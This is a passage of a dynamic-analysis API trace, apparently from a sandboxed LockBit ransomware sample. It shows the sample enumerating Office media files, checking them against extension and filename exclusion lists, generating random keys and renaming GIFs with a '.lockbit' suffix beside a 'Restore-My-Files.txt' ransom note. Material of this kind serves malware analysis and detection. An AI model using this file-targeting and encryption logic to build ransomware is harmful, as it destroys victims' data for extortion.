1 [0210.137] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0210.137] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0210.137] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0210.137] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0210.137] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0210.137] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0210.137] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.137] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0210.137] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0210.137] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0210.137] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0210.137] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21448_.GIF") returned 1 [0210.137] lstrcmpiW (lpString1="ntldr", lpString2="BD21448_.GIF") returned 1 [0210.137] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21448_.GIF") returned 1 [0210.137] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21448_.GIF") returned 1 [0210.137] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21448_.GIF") returned -1 [0210.137] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21448_.GIF") returned 1 [0210.137] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21448_.GIF") returned 1 [0210.137] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0210.138] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21448_.GIF") returned=".GIF" [0210.138] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0210.138] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0210.138] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0210.138] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0210.138] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0210.138] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0210.138] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0210.138] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0210.138] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0210.138] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0210.138] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0210.138] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0210.138] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0210.138] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0210.138] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0210.138] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0210.138] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0210.138] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0210.138] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0210.138] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0210.138] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0210.139] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0210.139] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0210.139] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0210.139] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0210.139] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0210.139] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0210.139] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0210.139] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21448_.GIF.lockbit") returned 76 [0210.139] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21448_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21448_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0210.140] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.141] malloc (_Size=0x40068) returned 0x3d70450 [0210.141] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=284) returned 1 [0210.141] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.141] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0210.141] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.142] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0210.142] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0210.143] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21448_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21448_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.143] malloc (_Size=0xae) returned 0x1fa2ed8 [0210.143] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0210.145] free (_Block=0x1fa2ed8) [0210.145] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21448_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0210.145] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0210.145] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.145] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b89da00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbced35e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5b89da00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x2da, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21495_.GIF", cAlternateFileName="")) returned 1 [0210.145] lstrcmpiW (lpString1=".", lpString2="BD21495_.GIF") returned -1 [0210.145] lstrcmpiW (lpString1="..", lpString2="BD21495_.GIF") returned -1 [0210.145] PathFindExtensionW (pszPath="BD21495_.GIF") returned=".GIF" [0210.145] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0210.145] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0210.145] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0210.145] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0210.145] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0210.145] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0210.145] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0210.145] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0210.145] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0210.145] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0210.146] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0210.146] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0210.146] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0210.146] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0210.146] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0210.146] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0210.146] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0210.146] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0210.146] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0210.146] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0210.146] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0210.146] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0210.146] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0210.146] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0210.146] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.146] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0210.146] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0210.146] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0210.146] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0210.146] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0210.147] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0210.147] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0210.147] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0210.147] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0210.147] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0210.147] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0210.147] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0210.147] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0210.147] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0210.147] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0210.147] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0210.147] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0210.147] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.147] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0210.147] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0210.147] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0210.147] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0210.147] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21495_.GIF") returned 1 [0210.147] lstrcmpiW (lpString1="ntldr", lpString2="BD21495_.GIF") returned 1 [0210.147] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21495_.GIF") returned 1 [0210.147] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21495_.GIF") returned 1 [0210.148] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21495_.GIF") returned -1 [0210.148] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21495_.GIF") returned 1 [0210.148] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21495_.GIF") returned 1 [0210.148] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0210.148] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21495_.GIF") returned=".GIF" [0210.148] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0210.148] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0210.148] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0210.148] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0210.148] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0210.148] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0210.148] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0210.148] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0210.148] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0210.148] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0210.148] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0210.148] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0210.148] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0210.148] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0210.148] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0210.148] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0210.149] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0210.149] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0210.149] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0210.149] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0210.149] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0210.149] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0210.149] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0210.149] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0210.149] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0210.149] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0210.149] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0210.149] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0210.149] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21495_.GIF.lockbit") returned 76 [0210.149] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21495_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21495_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0210.150] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.151] malloc (_Size=0x40068) returned 0x3e70008 [0210.151] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=730) returned 1 [0210.151] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.151] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0210.151] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.152] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.152] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0210.152] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0210.159] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21495_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21495_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.159] malloc (_Size=0xae) returned 0x1fa2ed8 [0210.159] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0210.161] free (_Block=0x1fa2ed8) [0210.161] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21495_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0210.161] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0210.161] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.161] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93911d00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcef9740, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x93911d00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x34d, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21512_.GIF", cAlternateFileName="")) returned 1 [0210.161] lstrcmpiW (lpString1=".", lpString2="BD21512_.GIF") returned -1 [0210.161] lstrcmpiW (lpString1="..", lpString2="BD21512_.GIF") returned -1 [0210.161] PathFindExtensionW (pszPath="BD21512_.GIF") returned=".GIF" [0210.161] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0210.161] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0210.161] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0210.161] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0210.162] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0210.162] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0210.162] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0210.162] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0210.162] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0210.162] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0210.162] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0210.162] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0210.162] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0210.162] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0210.162] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0210.162] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0210.162] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0210.162] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0210.162] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0210.162] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0210.162] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0210.162] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0210.162] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0210.162] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0210.163] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.163] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0210.163] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0210.163] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0210.163] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0210.163] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0210.163] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0210.163] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0210.163] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0210.163] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0210.163] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0210.163] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0210.163] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0210.163] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0210.163] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0210.163] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0210.163] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0210.163] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0210.163] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.163] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0210.164] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0210.164] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0210.164] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0210.164] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21512_.GIF") returned 1 [0210.164] lstrcmpiW (lpString1="ntldr", lpString2="BD21512_.GIF") returned 1 [0210.164] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21512_.GIF") returned 1 [0210.164] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21512_.GIF") returned 1 [0210.164] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21512_.GIF") returned -1 [0210.164] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21512_.GIF") returned 1 [0210.164] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21512_.GIF") returned 1 [0210.164] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0210.164] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21512_.GIF") returned=".GIF" [0210.164] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0210.164] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0210.164] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0210.164] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0210.164] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0210.164] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0210.164] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0210.164] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0210.165] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0210.165] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0210.165] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0210.165] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0210.165] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0210.165] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0210.165] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0210.165] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0210.165] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0210.165] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0210.165] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0210.165] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0210.165] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0210.165] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0210.165] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0210.165] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0210.165] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0210.165] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0210.165] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0210.165] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0210.166] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21512_.GIF.lockbit") returned 76 [0210.166] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21512_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21512_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0210.167] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.167] malloc (_Size=0x40068) returned 0x3ef0008 [0210.167] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=845) returned 1 [0210.167] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.168] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0210.168] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.168] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0210.168] ReadFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0210.173] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21512_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21512_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.173] malloc (_Size=0xae) returned 0x1fa2ed8 [0210.174] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0210.175] free 